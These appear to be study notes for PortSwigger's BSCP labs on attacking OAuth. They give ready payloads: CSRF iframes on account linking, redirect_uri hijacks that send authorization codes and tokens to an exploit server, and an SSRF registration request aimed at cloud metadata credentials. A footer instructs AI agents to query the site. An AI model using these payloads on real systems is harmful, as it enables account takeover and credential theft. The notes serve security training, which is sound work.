# oAuth

### General

OAuth 2.0 was originally developed as a way of sharing access to specific data between applications. It works by defining a series of interactions between three distinct parties, namely a client application, a resource owner, and the OAuth service provider.

* **Client application** - The website or web application that wants to access the user's data.
* **Resource owner** - The user whose data the client application wants to access.
* **OAuth service provider** - The website or application that controls the user's data and access to it. They support OAuth by providing an API for interacting with both an authorization server and a resource server.

Once you know the hostname of the authorization server, you should always try sending a `GET` request to the following standard endpoints:

* `/.well-known/oauth-authorization-server`
* `/.well-known/openid-configuration`

### Stole linking code and access other user

if you notice that the authorization request does not send a `state` parameter, this is extremely interesting from an attacker's perspective. It potentially means that they can initiate an OAuth flow themselves before tricking a user's browser into completing it

1. Generate profile linking with your account
2. Get linking code
3. Drop request
4. Send iFrame to victim

```
<iframe src="https://TARGET.net/oauth-linking?code=my-own-code></iframe>

6eqJiIz7ZvqtCHCJVxqLW-ZIGSP0upxVDq_Cd_ahKQO
```

5. Login with your social account
6. PRIV ESCALATION COMPLETE

### Redirect URI

Change the `redirect_uri` to point to the exploit server, then send the request and follow the redirect.&#x20;

```

<iframe src="https://oauth-YOUR-LAB-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net&response_type=code&scope=openid%20profile%20email"></iframe>

https://YOUR-LAB-ID.web-security-academy.net/oauth-callback?code=STOLEN-CODE
```

### Redirect URI with protection (directory traversal)

```
<script>
    if (!document.location.hash) {
        window.location = 'https://oauth-YOUR-OAUTH-SERVER-ID.oauth-server.net/auth?client_id=YOUR-LAB-CLIENT-ID&redirect_uri=https://YOUR-LAB-ID.web-security-academy.net/oauth-callback/../post/next?path=https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit/&response_type=token&nonce=399721827&scope=openid%20profile%20email'
    } else {
        window.location = '/?'+document.location.hash.substr(1)
    }
</script>
```

Victim access token will appear in the access log

In Repeater, go to the `GET /me` request and replace the token in the `Authorization: Bearer` header with the one you just copied

#### Unprotected dynamic client registration <a href="#unprotected-dynamic-client-registration" id="unprotected-dynamic-client-registration"></a>

\
Register new client

1. Get new client ID

```
POST /reg HTTP/1.1
Host: oauth-TARGET.web-security-academy.net
Content-Type: application/json
Content-Length: 206

{
"redirect_uris":["https://example.com"],
    "logo_uri" : "https://OASTIFY.COM",
	"logo_uri" : "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin/"
	
}  
```

2. In Repeater, go to the `GET /client/CLIENT-ID/logo` request. Replace the `CLIENT-ID` in the path with the new one you just copied and send the request.
3. Go to the Collaborator tab dialog and check for any new interactions. Notice that there is an HTTP interaction attempting to fetch your non-existent logo. This confirms that you can successfully use the `logo_uri` property to elicit requests from the OAuth server.
4. Add logo URI to the not accesable url of webapp credential
5. Go back to the `GET /client/CLIENT-ID/logo` request and replace the `client_id` with the new one you just copied. Send this request. Observe that the response contains the sensitive metadata for the OAuth provider's cloud environment, including the secret access key.

<br>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://oscp-7.gitbook.io/bscp-notes/stage-2/oauth.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.